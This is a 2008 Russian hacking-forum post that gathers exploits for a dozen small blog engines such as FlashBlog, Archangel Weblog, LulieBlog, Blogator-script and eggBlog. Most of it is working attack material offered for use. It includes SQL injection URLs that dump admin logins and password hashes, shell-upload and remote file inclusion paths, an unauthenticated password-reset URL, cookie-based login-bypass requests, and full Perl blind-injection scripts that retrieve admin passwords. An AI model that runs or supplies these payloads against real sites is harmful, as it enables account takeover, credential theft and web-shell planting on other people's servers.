Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
[ Обзор уязвимостей в блогах (кроме WР) ] |
09.06.2008, 05:21
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
[ Обзор уязвимостей в блогах (кроме WР) ]
Раздел называется "Движки CMS и блоги", а вот обзора по блогам, кроме Word Press, я не увидел, будем исправлять)))
FlashBlog beta0.31 Remote File Upload
Заливаем шелл здесь:
http://[site.com]/admin/Editor/imgupload.php
Просматриваем здесь:
http://[site.com]/tus_imagenes/shell.php
FlashBlog SQL Injection
Код:
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP код:
#!/usr/bin/perl -w
# Portal : Archangel Weblog 0.90.02
# Download : http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
# exploit aported password crypted
# mgharba :d:d:d:d
########################################
#[*] Founded & Exploited by : Stack-Terrorist [v40]
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.v4-Team/v4.txt
# * FILENAME: PerlSploitClass.pl
# *
# * CONTACT: dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ: Houssamix & Djekmani
########################################
#----------------------------------------------------------------------------#
########################################
system("color a");
print "\t\t############################################################\n\n";
print "\t\t# Archangel Weblog <= 0.90.02 - Remote SQL Inj Exploit #\n\n";
print "\t\t# by Stack-Terrorist [v40] #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username of news manages
$user="author_login";
#the pasword of news manages
$pass="author_password";
#the tables of news manages
$tab="authors";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
print "\nBrought to you by v4-team.com...\n";
print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by Stack-Terrorist --------------------#
########################################
miniBloggie 1.0 Delete Post
PHP код:
if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
[...]
elseif ($confirm=="yes") {
[...]
$sql = "DELETE FROM blogdata WHERE post_id=$post_id";
$query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
Vulner:
http://site/del.php?post_id=[postid]&confirm=yes
Example:
http://127.0.0.1/del.php?post_id=1&confirm=yes
Smartblog SQL Injection
Код:
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
BlogMe PHP SQL Injection
Код:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
BlogWorx 1.0 SQL Injection
Код:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
Blog PixelMotion SQL Injection
Код:
http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
Blog PixelMotion File Upload
Заливаем шелл сюда:
http://[Site]/[script]/admin/modif_config.php
Получаем здесь:
http://[Site]/[script]/templateZip/[shell]
Blog PixelMotion Database Backup
http://[Site]/[script]/admin/sauvBase.php
Таблица мемберов называется blog_utilisateurs
LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection
PHP код:
# LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection)
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# Site: http://devilsnight.altervista.org
# Date: 06/05/2008 [dd/mm/yyyy]
# Admin Auth Bypass:
# Modify Articles: send a request to site/Admin/article_modif2.php with:
# titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle]
# New Article: send a request to site/Admin/article_suppr.php with:
# titre=[titlearticle]&text=[text]&media=[media]
# Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with:
# pseudo=[newadminnick]&titre=[newblogtitle]
# Change Admin Email: send a request to site/Admin/mails_modif.php with:
# recevmail=1&emetteur=[email]&desti=[email]
# PS: All administration variables are vulnerables!
# Upload File (Simple Exploit):
<html>
<head><title>LulieBlog Uploader - http://cod3rz.helloweb.eu</title></head>
<body bgcolor='#000000' text='#FFFFFF'>
<form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'>
<font size='1' face='Verdana'>
<center>
Title:<br>
<input type='text' name='titre'><br>
File:<br>
<input type='file' name='fichier'><br>
<input type='hidden' name='lieu' value='0'>
Type File:<br> <select name='typemedia'>
<option value='1'>Image</option>
<option value='2'>Flash</option>
<option value='3'>Archive</option>
<option value='4'>Vid</option>
<option value='6'>Présentation PowerPoint</option>
<option value='7'>Fichiers PDF</option>
</select><br>
<input type='submit' name ='upload' value='Upload'></font></center>
</form></body></html>
# End
# Blind SQL Injection Exploit:
#!/usr/bin/perl
# LulieBlog 1.2 Remote Blind SQL Injection Exploit
# Author : Cod3rZ
# Site : http://cod3rz.helloweb.eu
# Site : http://devilsnight.altervista.org
# Usage : perl lb.pl site
use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;
$ua = LWP::UserAgent->new;
$site = "http://127.0.0.1/blog";
if(!$site) { &usage; }
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
sub usage {
print " Usage: perl ig.pl site \n";
print " Ex.: perl ig.pl http://127.0.0.1 \n";
}
sub request {
$var = $_[0];
$start = Time::HiRes::time();
$response = $ua->request(GET $var,s => $var);
$response->is_success() || print("$!\n");
$end = Time::HiRes::time();
$time = $end - $start;
return $time
}
sub refresh{
system("cls");
print " -------------------------------------------------\n";
print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n";
print " Powered by Cod3rZ \n";
print " http://cod3rz.helloweb.eu \n";
print " -------------------------------------------------\n";
print " Please Wait.. \n";
print " Hash : " . $_[3] . " \n";
print " -------------------------------------------------\n";
}
for ($i = 1; $i < 33; $i++)
{
for ($j = 0; $j < 16; $j++)
{
$var = $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*";
system('pause');
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
if($time > 4)
{
$time = request($var);
refresh($host,$timedefault,$j,$hash,$time,$i);
$hash .= chr($array[$j]);
refresh($host,$timedefault,$j,$hash,$time,$i);
$j=200;
}}
if($i == 1 && !$hash)
{
print " Failed \n";
print " -------------------------------------------------\n";
die();
}
if($i == 32) {
print " Exploit Terminated \n";
print " -------------------------------------------------\n ";
system('pause');
}}
# http://cod3rz.helloweb.eu
Battle Blog <= 1.25 SQL Injection
Для MS SQL Server:
/comment.asp?entry=22+and+1=convert(int,(select+@@v ersion))--
Для Ms ACCESS:
/comment.asp?entry=IIF((select%20mid(last(Name),1,1 )%20from%20(select%20top%2010%20Namee%20from%20MSy sObjects))='a',0,'done')%00
Blogator-script 0.95 Change User Password
Уязвимый код:
PHP код:
line 23: $id=$_GET['a'];
line 24:$email=$_GET['b'];
line 25: $mdp=$_GET['c'];
.....
line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1");
Код:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
Blogator-script 0.95 SQL Injection
Уязвимый код:
PHP код:
line 27: $id_art=$_GET['id_art'];
......
line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre");
Код:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
Blogator-script 0.95 File Inclusion
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
eggBlog 4.0 SQL Injection
PHP код:
# Author: __GiReX__
# mySite: girex.altervista.org
# Date: 27/03/2008 - 1/04/2008 Added exploit for str0ke
# CMS: eggBlog 4.0
# Site: eggblog.net
# Bug: SQL Injection (cookie vars)
# Type: 1 - Admin/User Authentication Bypass
# Bug2: Blind SQL Injection (same vars-query)
# Type: Password retrieve exploit
# Var : $_COOKIE['email], $_COOKIE['password']
# Need: magic_quotes_gpc = Off
# File: index.php
require_once "_lib/global.php";
...
eb_pre();
# File: /_lib/globals.php
require_once '_lib/user.php';
...
function eb_pre() {
...
if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1);
# Let we see function eb_login
# File: /_lib/user.php
function eb_login($email,$password,$key) {
...
if($key==0) $password=md5($password);
# Our $key is set to 1 so the password will not cprypted
$sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND md5(user_password)=\"".$password."\"";
$query=mysql_query($sql);
# I have no words, 2 vars not sanizated into a SELECT query
PoC 1:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1
# With this you will be authenticated with the fist record of table eb_user
PoC 2:
GET [PATH]/index.php HTTP/1.1
Host: [HOST]
...
Cookie: email=@" OR "1; password=@" OR "1" AND user_id="[VICTIM_USER_ID]
# For anybody you want
##############################################################################################################
# Start Blind SQL Injection / Password retrieve exploit #
# NOTE: Password is in plain-text so take a coffe... #
##############################################################################################################
#!/usr/bin/perl -w
# EggBlog v4.0 Blind SQL Injection
# Password Retrieve Exploit
# Coded by __GiReX__
use LWP::UserAgent;
use HTTP::Request;
if(not defined $ARGV[0])
{
print "usage: perl $0 [host] [path]\n";
print "example: perl $0 localhost /eggblog/\n";
exit;
}
my $client = new LWP::UserAgent;
my @cset = (32..126, 0);
my ($i, $j, $hash) = (0, 1, undef);
my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];
banner();
check_vuln($host) or die "[-] Site not vulnerable\n";
while($i != $#cset)
{
for($i = 0; $i <= $#cset; $i++)
{
my ($pre_time, $post_time) = time();
$rv = check_char($host, $cset[$i], $j);
$post_time = time();
info(chr($cset[$i]), $post_time - $pre_time, $hash);
if($post_time - $pre_time > 3 and $rv)
{
$hash .= chr($cset[$i]);
last;
}
}
$j++;
}
print "\n". (defined $hash) ?
"[+] Admin password: ${hash} \n":
"[-] Exploit mistake: please check benchmark and charset\n";
print "[+] Exploit terminated\n\n";
sub banner
{
print "\n";
print "[+] EggBlog v4.0 Blind SQL Injection\n";
print "[+] Password Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}
sub check_vuln
{
my ($target, $res) = @_;
$get = new HTTP::Request(GET, $target);
$get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;');
$res = $client->request($get);
if($res->is_success)
{
return 1 if $res->content =~ /<b>Warning<\/b>:/;
}
return 0;
}
sub check_char
{
my ($target, $char, $n, $res) = @_;
$get->header(Cookie =>
'email=-1"+AND+'.
'CASE+WHEN'.
'((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'.
'THEN+benchmark(90000000,CHAR(0))+'.
'END#; '.
'password=dummy_psw');
$res = $client->request($get);
return $res->is_success;
}
sub info
{
my ($char, $delay, $hash) = @_;
print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash;
# print STDOUT "[+] Char: ${char} - Delay: ${delay}\r";
$| = 1;
}
# milw0rm.com [2008-04-01]
З.Ы. Буду постепенно добавлять уязвимости.... |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Древовидный вид